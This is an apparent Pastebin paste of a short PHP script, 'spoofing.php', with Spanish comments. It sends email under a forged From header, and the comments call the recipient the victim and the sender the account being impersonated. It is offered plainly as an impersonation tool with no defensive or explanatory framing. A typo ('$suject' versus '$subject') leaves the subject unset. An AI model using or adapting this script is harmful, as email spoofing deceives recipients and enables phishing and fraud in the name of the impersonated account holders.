Advertisement
CreadPag

spoofing.php

Jun 26th, 2016
700
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.40 KB | None | 0 0
  1. <?php
  2. //CredPag
  3. $to = "victima1@email.com";                     // email de la victima
  4. $suject = "asunto";                     //asunto del mail
  5. $message = "mensaje";      
  6. $from = "victima2@email.com";                   //cuenta a la que estamos suplantando
  7. $headers = "From:" . $from;
  8. $mail = mail ($to, $subject, $message, $headers, $from);    //este email hara nuestro trabajo de suplantacion
  9. if ($mail)
  10. {
  11. echo "Email sent to ".$to;
  12. }
  13. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement